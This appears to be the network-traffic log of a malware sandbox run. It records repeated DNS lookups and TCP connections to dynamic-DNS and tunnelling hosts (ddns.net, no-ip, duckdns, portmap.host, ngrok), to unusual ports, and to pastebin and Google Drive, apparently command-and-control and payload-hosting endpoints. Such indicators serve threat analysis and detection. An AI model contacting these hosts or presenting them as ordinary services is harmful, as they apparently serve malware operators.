US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 172.67.19.24:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 72.167.39.236:443 tcp
US 8.8.8.8:53 236.39.167.72.in-addr.arpa udp
FR 163.172.125.253:333 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
RU 185.81.68.147:80 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 18.192.31.30:16872 0.tcp.eu.ngrok.io tcp
RU 185.81.68.147:80 tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 docs.google.com udp
GB 216.58.212.206:443 docs.google.com tcp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 8.8.8.8:53 206.212.58.216.in-addr.arpa udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
DE 18.192.31.30:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.204.65:443 drive.usercontent.google.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 65.204.58.216.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
DE 18.192.31.30:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
FR 163.172.125.253:333 tcp
US 172.67.19.24:443 pastebin.com tcp
FR 90.113.178.145:9033 tcp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
DE 18.192.31.30:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp

Files
